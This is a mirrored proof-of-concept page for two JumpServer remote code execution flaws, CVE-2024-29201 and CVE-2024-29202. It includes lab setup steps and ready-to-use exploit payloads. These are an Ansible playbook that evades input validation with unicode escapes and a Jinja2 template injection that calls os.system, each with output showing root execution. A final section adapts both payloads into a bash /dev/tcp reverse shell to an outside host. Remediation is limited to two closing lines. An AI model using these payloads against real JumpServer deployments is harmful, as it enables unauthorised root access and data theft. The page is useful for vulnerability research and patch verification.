mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-06 11:27:43 +00:00
# JumpServer Remote Code Execution Vulnerabilities CVE-2024-29201 & CVE-2024-29202

## Vulnerability Description

JumpServer is a widely used open-source bastion host released under the GNU GPL v2.0 license; it is an operations security audit system that conforms to the 4A specification.

- CVE-2024-29201 remote code execution: because the Ansible module in JumpServer does not fully validate its input, an attacker holding a low-privileged account can bypass the input validation mechanism, execute arbitrary code in the Celery container, and from there steal sensitive information from the host or manipulate the database.
- CVE-2024-29202 Jinja2 template injection: an authenticated attacker can craft a malicious playbook template and abuse the Jinja2 template engine used by Ansible to execute arbitrary code in the Celery container, and from there steal sensitive information from the host or manipulate the database.

**Exploiting either vulnerability requires an account that is authorized for at least one asset.**

References:

- https://github.com/jumpserver/jumpserver/security/advisories/GHSA-pjpp-cm9x-6rwj
- https://github.com/jumpserver/jumpserver/security/advisories/GHSA-2vvr-vmvx-73ch
- https://wh0am1i.com/2024/03/30/JumpServer-CVE-2024-29201-CVE-2024-29202/

## Affected Versions

```
v3.0.0 <= JumpServer <= v3.10.6
```

## Network Mapping

```
app="JumpServer-Bastion-Host"
```

## Environment Setup

Download the official [script](https://resource.fit2cloud.com/jumpserver/jumpserver/releases/latest/download/quick_start.sh), edit `quick_start.sh`, and change `VERSION` in the script to a vulnerable version, for example `V3.10.6`.

Once the environment is up, open `http://your-ip` to reach the JumpServer home page; the default credentials are `admin/admin`. After a login with the default password, JumpServer forces the user to change it.

### Create a user

```
User Management → User List → Create
```

Create the user `threekiii`; this account is used for the attack steps that follow:

### Add an asset

Prepare a Linux asset:

```
[IP Address] 192.168.43.169
[Username/Password] kali/kali
```

Add this Linux asset to the asset list and name it `test`:

```
Asset Management → Asset List → Create
```

After the asset is added, click Update, add the account `kali`, and set its password to `kali`:

Click Test to verify that the configuration works:

### Authorize the asset

Grant the user `threekiii` access to the asset `test` added in the previous step:

```
Permission Management → Asset Authorization → Create
```

## Reproduction

### CVE-2024-29201

Log in to JumpServer as the attacker user `threekiii`, switch to the Workbench, and create a Playbook named `CVE-2024-29201`:

```
Job Center → Template Management → Playbook Management → Create → Create playbook
```

Click the name of the newly created Playbook `CVE-2024-29201`, switch to the Workspace, enter the following content, and save:

```
[{
    "name": "RCE playbook",
    "hosts": "all",
    "tasks": [
        {
            "name": "this runs in Celery container",
            "shell": "id > /tmp/awesome_poc",
            "\u0064elegate_to": "localhost"
        } ],
    "vars": {
        "ansible_\u0063onnection": "local"
    }
}]
```

Switch to Job Management and create a new Playbook job:

```
Job Center → Job Management → Create → Playbook job
```

Click Submit to run the job:

Enter the Celery container; the file `awesome_poc` has been created under `/tmp`:

```
root@jms_celery:/opt/jumpserver# ls /tmp
artifacts awesome_poc local.pid worker_heartbeat_ansible worker_heartbeat_celery worker_ready_ansible worker_ready_celery

root@jms_celery:/opt/jumpserver# cat /tmp/awesome_poc
uid=0(root) gid=0(root) groups=0(root)
```

### CVE-2024-29202

Log in to JumpServer as the attacker user `threekiii`, switch to the Workbench, and create a Playbook named `CVE-2024-29202`:

```
Job Center → Template Management → Playbook Management → Create → Create playbook
```

Click the name of the newly created Playbook `CVE-2024-29202`, switch to the Workspace, enter the following content, and save:

```
- name: |
    {% for x in ().__class__.__base__.__subclasses__() %}
    {% if "warning" in x.__name__ %}
    {{
    x()._module.__builtins__["__import__"]("os").system("id > /tmp/awesome_poc_2")
    }}
    {%endif%}
    {%endfor%}
```

Switch to Job Management and create a new Playbook job:

```
Job Center → Job Management → Create → Playbook job
```

Click Submit to run the job; the error that is reported does not prevent execution:

Enter the Celery container; the file `awesome_poc_2` has been created under `/tmp`:

```
root@jms_celery:/opt/jumpserver# ls /tmp
artifacts awesome_poc awesome_poc_2 local.pid worker_heartbeat_ansible worker_heartbeat_celery worker_ready_ansible worker_ready_celery
root@jms_celery:/opt/jumpserver# cat /tmp/awesome_poc_2
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.250.7 jms_celery
```

### Reverse Shell

CVE-2024-29201 payload:

```
[{
    "name": "RCE playbook",
    "hosts": "all",
    "tasks": [
        {
            "name": "this runs in Celery container",
            "shell": "bash -i >& /dev/tcp/your-ip/8888 0>&1",
            "\u0064elegate_to": "localhost"
        } ],
    "vars": {
        "ansible_\u0063onnection": "local"
    }
}]
```

CVE-2024-29202 payload:

```
- name: |
    {% for x in ().__class__.__base__.__subclasses__() %}
    {% if "warning" in x.__name__ %}
    {{
    x()._module.__builtins__["__import__"]("os").system("bash -i >& /dev/tcp/your-ip/8888 0>&1")
    }}
    {%endif%}
    {%endfor%}
```

## Remediation

1. Upgrade to v3.10.7. The vendor has fixed both vulnerabilities in the latest release; download: https://github.com/jumpserver/jumpserver/releases.
2. Disable the Task Center, located at: System Settings - Feature Settings - Task Center.